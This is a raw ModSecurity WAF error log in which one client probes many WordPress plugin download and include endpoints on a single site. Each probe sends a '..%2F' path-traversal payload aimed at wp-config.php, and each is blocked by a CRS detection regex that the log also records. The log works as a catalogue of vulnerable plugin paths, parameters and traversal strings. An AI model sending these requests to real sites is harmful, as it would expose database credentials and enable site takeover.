"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "Y0ZxPWINFIoIk7hPzpaZDQAAAE4"] [Wed Oct 12 02:48:14.015006 2022] [:error] [pid 22338:tid 140534425290496] [client 185.189.115.30:49628] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "Y0ZxPmINFIoIk7hPzpaZDgAAAEw"] [Wed Oct 12 02:48:14.165703 2022] [:error] [pid 22338:tid 140534332970752] [client 185.189.115.30:49630] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/bookx/includes/bookx_export.php"] [unique_id "Y0ZxPmINFIoIk7hPzpaZDwAAAFc"] [Wed Oct 12 02:48:14.332759 2022] [:error] [pid 22338:tid 140534358148864] [client 185.189.115.30:49632] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "Y0ZxPmINFIoIk7hPzpaZEAAAAFQ"] [Wed Oct 12 02:48:14.749163 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:49634] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "Y0ZxPtmZws0mEkXxGo-VGQAAAI4"] [Wed Oct 12 02:48:14.901318 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:49636] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "Y0ZxPuLrJ0tgpRmNRAaHdgAAAMw"] [Wed Oct 12 02:48:15.091290 2022] [:error] [pid 22972:tid 140534564054784] [client 185.189.115.30:49638] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php"] [unique_id "Y0ZxP-LrJ0tgpRmNRAaHdwAAAMQ"] [Wed Oct 12 02:48:15.257179 2022] [:error] [pid 22972:tid 140534475646720] [client 185.189.115.30:49640] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "Y0ZxP-LrJ0tgpRmNRAaHeAAAAMY"] [Wed Oct 12 02:48:15.424778 2022] [:error] [pid 22972:tid 140534442075904] [client 185.189.115.30:49642] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/disclosure-policy-plugin/functions/action.php"] [unique_id "Y0ZxP-LrJ0tgpRmNRAaHeQAAAMo"] [Wed Oct 12 02:48:15.576709 2022] [:error] [pid 22339:tid 140534425290496] [client 185.189.115.30:49644] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/dm-albums.php"] [unique_id "Y0ZxP9mZws0mEkXxGo-VGgAAAIw"] [Wed Oct 12 02:48:15.754630 2022] [:error] [pid 22339:tid 140534416897792] [client 185.189.115.30:49646] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/template/album.php"] [unique_id "Y0ZxP9mZws0mEkXxGo-VGwAAAI0"] [Wed Oct 12 02:48:15.923917 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:49648] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dukapress/lib/dp_image.php"] [unique_id "Y0ZxP9mZws0mEkXxGo-VHAAAAIU"] [Wed Oct 12 02:48:16.075282 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:49650] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "Y0ZxQNmZws0mEkXxGo-VHQAAAJI"] [Wed Oct 12 02:48:16.226041 2022] [:error] [pid 22972:tid 140534416897792] [client 185.189.115.30:49652] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php/"] [unique_id "Y0ZxQOLrJ0tgpRmNRAaHegAAAM0"] [Wed Oct 12 02:48:16.395714 2022] [:error] [pid 22338:tid 140534467254016] [client 185.189.115.30:49654] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "Y0ZxQGINFIoIk7hPzpaZEQAAAEc"] [Wed Oct 12 02:48:16.551932 2022] [:error] [pid 22338:tid 140534400112384] [client 185.189.115.30:49656] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "Y0ZxQGINFIoIk7hPzpaZEgAAAE8"] [Wed Oct 12 02:48:16.704606 2022] [:error] [pid 22337:tid 140534349756160] [client 185.189.115.30:49658] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"] [unique_id "Y0ZxQKBKlkjFPqrcdjM3lQAAABU"] [Wed Oct 12 02:48:16.865911 2022] [:error] [pid 22337:tid 140534425290496] [client 185.189.115.30:49660] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "Y0ZxQKBKlkjFPqrcdjM3lgAAAAw"] [Wed Oct 12 02:48:17.017493 2022] [:error] [pid 22337:tid 140534341363456] [client 185.189.115.30:49662] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3lwAAABY"] [Wed Oct 12 02:48:17.167939 2022] [:error] [pid 22337:tid 140534391719680] [client 185.189.115.30:49664] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ibs-mappro/lib/download.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3mAAAABA"] [Wed Oct 12 02:48:17.330722 2022] [:error] [pid 22337:tid 140534324578048] [client 185.189.115.30:49666] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/image-export/download.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3mQAAABg"] [Wed Oct 12 02:48:17.496136 2022] [:error] [pid 22337:tid 140534332970752] [client 185.189.115.30:49668] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3mgAAABc"] [Wed Oct 12 02:48:17.646634 2022] [:error] [pid 22337:tid 140534366541568] [client 185.189.115.30:49670] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] 